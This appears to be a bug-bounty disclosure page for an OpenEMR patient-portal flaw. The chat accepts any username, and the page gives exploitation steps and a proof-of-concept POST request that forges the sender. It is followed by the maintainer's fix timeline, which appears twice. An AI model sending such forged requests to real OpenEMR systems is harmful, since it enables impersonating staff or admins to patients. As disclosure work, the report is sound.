Send message in chat function with any username in openemr/openemr

Valid

Reported on

Jul 20th 2022

Description

In chat function, username is not validated. We can change username to any value we want which not match with logged in user.

Exploitation steps:

1. Login with Phil1 account (Patient account).
2. Send message via Burpsuite proxy
3. Modify username to any value you want (I user "n00b")
4. As the result, the message is sent from "n00b" not from "Phil Belford"

Proof of Concept

POST /openemr/portal/messaging/secure_chat.php?action=save HTTP/1.1
Host: demo.openemr.io
Cookie: username=Phil%20Belford; PortalOpenEMR=wte53yTGjI7VYMcBHd%2C%2CO%2C-qdK6nklsE7Qo2F87g949Hz988
Referer: https://demo.openemr.io/openemr/portal/messaging/secure_chat.php
...

username=n00b&message=message+from+n00b&sender_id=1&recip_id=%5B%22admin%22%5D

POC image:

POCimage

Impact

Attackers can impersonate any user he wants even admin to chat with others.

We are processing your report and will contact the openemr team within 24 hours. a year ago

Lê Thị Mỹ Duyên modified the report

a year ago

We have contacted a member of the openemr team and are waiting to hear back a year ago

We have sent a follow up to the openemr team. We will try again in 7 days. a year ago

Brady Miller validated this vulnerability a year ago

Thanks for the reports. We are working on a fix.

Lê Thị Mỹ Duyên has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Brady Miller

commented a year ago

Maintainer

A preliminary fix has been posted in commit 41b4888a36d68a666995562ff3edb3e55f64b9cd

Please do not create a CVE # or make this vulnerability public at this time. I will make this fix official about 1 week after we release 7.0.0 patch 1 (7.0.0.1), which will likely be in about 3-7 weeks. After I do that, then will be ok to make CVE # and make it public.

Thanks!

We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago

We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago

Brady Miller marked this as fixed in 7.0.0.1 with commit 41b488 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Brady Miller

commented a year ago

Maintainer

OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

to join this conversation

We are processing your report and will contact the openemr team within 24 hours. a year ago

Lê Thị Mỹ Duyên modified the report

a year ago

We have contacted a member of the openemr team and are waiting to hear back a year ago

We have sent a follow up to the openemr team. We will try again in 7 days. a year ago

Brady Miller validated this vulnerability a year ago

Thanks for the reports. We are working on a fix.

Lê Thị Mỹ Duyên has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Brady Miller

commented a year ago

Maintainer

A preliminary fix has been posted in commit 41b4888a36d68a666995562ff3edb3e55f64b9cd

Thanks!

We have sent a fix follow up to the openemr team. We will try again in 7 days. a year ago

We have sent a second fix follow up to the openemr team. We will try again in 10 days. a year ago

Brady Miller marked this as fixed in 7.0.0.1 with commit 41b488 a year ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Brady Miller

commented a year ago

Maintainer

OpenEMR patch 1 (7.0.0.1) has been released, so this has been fixed. You have permission to make CVE # and make this public.

to join this conversation